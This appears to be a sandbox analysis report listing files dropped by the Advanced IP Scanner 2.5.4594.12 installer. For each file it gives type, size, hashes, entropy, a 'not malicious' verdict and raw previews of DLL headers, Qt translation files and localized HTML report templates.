Preview:	<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7...e..Z.......Z........6. =...Fo..y......y...]..%..$...0..$..+.....G.+.......+....x.+......+....&..G.... ..G......H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.\|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-6AQSD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1142
Entropy (8bit):	5.0337822285325755
Encrypted:	false
SSDEEP:	24:lFoSssuSVIXqFHGqP97iV0Kt5RGDqReEhyv:HXssRVIXqFHGqP900U2Dws
MD5:	34B8B376FC335077A97D5C218E01E14D
SHA1:	45D32290176CF33D77EA0FE8F40D0BC3D6D6F2C8
SHA-256:	3733D0B7A0B799AD19140DCB4D22C8B024E102D7C2D44AF1D6CCCAAB9920CF12
SHA-512:	7A65D54FB9EE70B953A83E960337C6E4352207D82F99F041E29A57E9BEB8C80891295A39F038F8E463362506BDA375046891D1ECFEC075CD6FD5603933382FB3
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>..</center></b></

C:\Program Files (x86)\Advanced IP Scanner\is-6ED21.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27091
Entropy (8bit):	4.712868636230012
Encrypted:	false
SSDEEP:	384:WnNvji4/oUBfrXnBZRxyS/ROxXU9wpDPogAD0+q4:sjgUBfrXBZRxy4RZID2
MD5:	9D3E23BE36601D3604F9F370942DAA55
SHA1:	AE2ABAC157B6AB18E590F20B35568F03E5FA7A67
SHA-256:	0C5513FF8480C5A7372274E88581D13F89F4066DE5372C56C4220FCAB4C53D85
SHA-512:	3D93C6C33AB9EAA998BDFB1CB8384B7CA111EFF8D39DED2D9FD00CDB3588D6352C5A20CE08AA93704B4734AF61F8E8201FCFEA0D8EB984DAFF0FE888AE73B1E7
Malicious:	false
Preview:	<.d....!..`...B..........VR...;.......;.......;...O...;.......;..AZ...O..Y....[..T....^...A...^..P...(5......G....&..H,..M...K...=...N:......V...B..._...Z,......'.......M....y..Ne......................V$...t..);...t..N....t..X......>....j......5t......@...@...H5..V...f....e......C^.......{.......?...~..1....`..5....e..X#......XK.......`. =...D_..y...&..y...S..%..#...0..#..+.......+.......+......+......+....%..G...../.G....)..H0...X{.Hw9...w.Hw9...k.I....'l.J6......J6....0.J6......J6...F..LD......L.b..X..M.S..?..R.....R.V.......Wi...W..W.T...'.Z.\|..O..[f3..Sd.gc....^.w0K..Ex..H...$.......Y....T......."..2....~..5... d..C....T..,...2...........WN......]9.9.E..>F.L.#.._..M$o.....e.......l8...4....^..G...I....@......@.......P}......W...>......>...x..3..-...l...H.......8..5.l..\W.AV...'-.y....UW...0..QJ......PE......V...tb..3........Y..............Q.......;f......L..(....P..1V...(<.R....0..W.<..\..f.~.. .......2...1........^..4....5..............c..D..;6...^E.q.J..ML..I....o..I

C:\Program Files (x86)\Advanced IP Scanner\is-6GDPR.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6708264
Entropy (8bit):	6.661851136227646
Encrypted:	false
SSDEEP:	98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
MD5:	1FBE59E9BE0F445BB14BE02C0EE69D6F
SHA1:	98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
SHA-256:	F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
SHA-512:	00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../\|..B}.\|/\|..B}..*\|..B}..B\|.#G}.\|/y..B}.\|/x..C}.\|/}..B}.\|/...B}..B.B}.\|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-6TU4J.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.789609676615686
Encrypted:	false
SSDEEP:	24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
MD5:	C81043ED485CCE96CDA08A5986F04E31
SHA1:	8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
SHA-256:	119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
SHA-512:	56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

C:\Program Files (x86)\Advanced IP Scanner\is-78DGF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	5.068076577523285
Encrypted:	false
SSDEEP:	24:lFokcsuSRVXqhayHmP9a0Kt5RGDD4ReEhyv:HpcsRPXqhayHmP9a0U2DDSs
MD5:	1E41F2F1C303F750C96681515894C7B4
SHA1:	A6B4E2EC874030D50A0156E4A6CF2EF952F11455
SHA-256:	350321BFDAD2FD43E09E94DC59F47888B21BECA6EDAE3D23A7C90B7E246611C0
SHA-512:	ACA0D361A7EE82263804FC9C210FD829EFD6FD633F3053A9D7DE801C620FC4B981337721B6FEDA6D05F0E80289BC874B7B0AAE9B1E74C0320C14F00DA258B7FD
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>....</cent

C:\Program Files (x86)\Advanced IP Scanner\is-7T7KO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.030340698171656
Encrypted:	false
SSDEEP:	384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
MD5:	F6B4D8D403D22EB87A60BF6E4A3E7041
SHA1:	B51A63F258B57527549D5331C405EACC77969433
SHA-256:	25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
SHA-512:	1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-7U4R7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.820312505780483
Encrypted:	false
SSDEEP:	24:lFoJgsuSAXqSH+l70Kt5RGDSRBIReEhyv:HogsRAXqSH+l70U2Di0s
MD5:	D085FB64BFB3757DB202DE6552075927
SHA1:	6D7D1701D2C4A9E4AF18217DD9169E19E1D03F3A
SHA-256:	411862A29DF284FA2D4B2E33FB9839DD030A99EBC5823212E9CDB2FFCFB3EE26
SHA-512:	5BEA33C25F3A28D1138834F6E6D8C2D9BAEAFEE39833980C1EC022ED8EEAE75453747CF844C31232F9F46D77C427F388CF65B070F03ED5C81B166D85BBD41379
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stanje:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacijski sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvajalec:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Uporabnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarji:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Storitev</center></b></td><td><b><center>Podro

C:\Program Files (x86)\Advanced IP Scanner\is-7UOKJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.9718846004654225
Encrypted:	false
SSDEEP:	384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
MD5:	B8BB783DEE4EA95576882625C365E616
SHA1:	E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
SHA-256:	21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
SHA-512:	B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-8ANUI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327208
Entropy (8bit):	6.804582730583226
Encrypted:	false
SSDEEP:	6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
MD5:	72B2E7A9AF236E5CA0C27107E8C5690C
SHA1:	6AC273911118C7CAA71818C55E22D27B4C36B843
SHA-256:	725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
SHA-512:	C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8.*8...8..9...8..9...8..9...8..9...8...9...8...9...8...8..8...9...8...9...8..F8...8...8...8...9...8Rich...8................PE..L...t.%^...........!.....z...j......T.....................................................@..........................}...k..............................(........7...a..T....................b.......a..@............................................text....x.......z.................. ..`.rdata...............~..............@..@.data...............................@....rsrc...............................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-8I66A.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.778007627268145
Encrypted:	false
SSDEEP:	768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
MD5:	5E72659B38A2977984BBC23ED274F007
SHA1:	EA622D608CC942BDB0FAD118C8060B60B2E985C9
SHA-256:	44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
SHA-512:	ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-8J16O.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1751
Entropy (8bit):	4.952964955431726
Encrypted:	false
SSDEEP:	48:ngn27UxzUZMUejUC3UCIUZzoUH0iUvoU7wpYlUQwU2DY4IO:gjmhfd0t07cqyOoIO
MD5:	23760926BFC668193D027DB24E198051
SHA1:	FF7AC19A7113F2DAA66B20C310A09752620E6455
SHA-256:	2E4A9A21A7D3444008849936F5473F78CB4DB93E9EE0992F023767B682300635
SHA-512:	F4B91BA666141C00C2282F2DCB3D5EB75F709A8E58D4DBF8992DAF17A1F163E019D1843A3A2441F392A46E4B9397666B5AD3CC76385BA3DF6897105250506E33
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>..... ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>......: ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td

C:\Program Files (x86)\Advanced IP Scanner\is-8NFDN.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29376
Entropy (8bit):	6.5989266511221745
Encrypted:	false
SSDEEP:	384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
MD5:	D0D380AF839124368A96D6AA82C7C8AE
SHA1:	E2AC42F829085E0E5BEEA29FCFF09E467810A777
SHA-256:	06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
SHA-512:	DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-8VOIL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	4.850275626289269
Encrypted:	false
SSDEEP:	24:lForPQsuSRBXqDH03Rrh0Kt5RGDVx3rgReEhyv:HyPQsRRBXqDHyRt0U2DVtras
MD5:	6B21CA02EF7F5C3E6641DBB222A207DC
SHA1:	215CE642734FDA5004F603E593FAA2EB70663500
SHA-256:	3B0A1534FFEF9FB0B1BA169DDA53E26A940E0C644A47D8567E4E804D3DFADF24
SHA-512:	A61FEAEBB6819C6B2CCC8120FB5E64CE71E8399C19221255FB7C3BCB9F557291A75CF965704003A7EA748753097B9E43D0548C1ACC9FE76DA490F70D55B85461
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Olek:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Ops.steem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tootja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kasutaja:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T..p:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Kuup.ev:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentaarid:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Teenus</center></b></td><td><b><center>.ksikasjad</cente

C:\Program Files (x86)\Advanced IP Scanner\is-94LO6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.021897050678374
Encrypted:	false
SSDEEP:	384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
MD5:	687533A89B43510CCE4D8B2ECB261AA0
SHA1:	4004BA63880A92042C106FF6A549C6F5F69CE05D
SHA-256:	E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
SHA-512:	6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-9F277.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28836
Entropy (8bit):	5.274937745581086
Encrypted:	false
SSDEEP:	768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
MD5:	EE64BC556D9E554E5122531BBA368240
SHA1:	C691C2D832157EF9FD50F0D2C5B91EA9B6934979
SHA-256:	11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
SHA-512:	23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
Malicious:	false
Preview:	<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I...y......y......%..&...0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.\|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V.....R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I

C:\Program Files (x86)\Advanced IP Scanner\is-9M7P7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27282
Entropy (8bit):	4.801156368722529
Encrypted:	false
SSDEEP:	768:ZUOMiBL2+9VpzlQLm8QKHsbWSBSj4a/sqS4uCRam1bUvmRF:boP64jf+4uCRR
MD5:	4DD48C8DA1964B46D4D972244288081A
SHA1:	1A9802C9FA07BF41FAF924E2C2DE6A9D6E6EFFC5
SHA-256:	572E3D6ABD3A7BE7F4F464DDBD53A6AE2657E8DC0427B59D9A942D8A04833323
SHA-512:	59A873E28746DA37458C3C37EC8B7E7F303E57FA6EADC3A2DCAB8456DCA625EA4A96D05B83DA434A92FE3CFB37578564B0279A9E27E85D6E8ED3EF4E7E4021E9
Malicious:	false
Preview:	<.d....!..`...B..........V....;.......;...w...;...S...;.. ....;..A....O..Y\...[..UD...^...G...^..QP..(5......G.......H,..N...K...=...N:......V...Ck.._...Z.......'.......N....y..O................j......Vr...t..)G...t..O....t..Y......>....j...!..5t...)..@...@...H5..W/..f....m......D2.......c.......S...~..1&...`..5....e..X.......X........,. =...E=..y...P..y...-..%..#...0..#..+.......+.......+......+......+....%_.G.....5.G....)..H0...X..Hw9...C.Hw9...[.I....'d.J6......J6....D.J6......J6...G..LD......L.b..Y4.M.S..?H.R.....<.V.......Wi...X..W.T.....Z.\|..PK.[f3..S..gc....v.w0K..FZ..H...$u......Z....T......."..2....~..52.. d..D....T..,...2...........W.......]..9.E..>Z.L.#..`e.M$o.....e.......l8...4....^..G...I....D......@.......Q.......WS..>......>...~..3..-...l...IR......7..5.l..\..AV...'!.y....U....0..Q.......P.......V...tb..3................c......R#......;z......M8.(....Q\|.1V...(<.R....0%.W.<..]m.f.~.. .......2...1........^..4....5..........\|...c..D..;6..._..q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-9OG2K.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.8635515480686085
Encrypted:	false
SSDEEP:	24:lFozSsuSxXqXH0k9/Ue/0Kt5RGD4ReEhyv:HESsRxXqXHBUM0U2DSs
MD5:	E63975AFFC0CFD1416D93982E6E0C0E8
SHA1:	28F0F8996D128E8095BE958B32F245F1EBB90D60
SHA-256:	6B385410B01F24D20294E1B92E7D391F20D146A0AAB937809483C8ED624017CA
SHA-512:	2DE0EA4CF7C1B0FBB3375A2E46677E48C7CE967954ED19B9B43DCACA462960A55969E6EB7FA51E12656F812C6768CA1E135007111BD4AAA31055847F229656D5
Malicious:	false
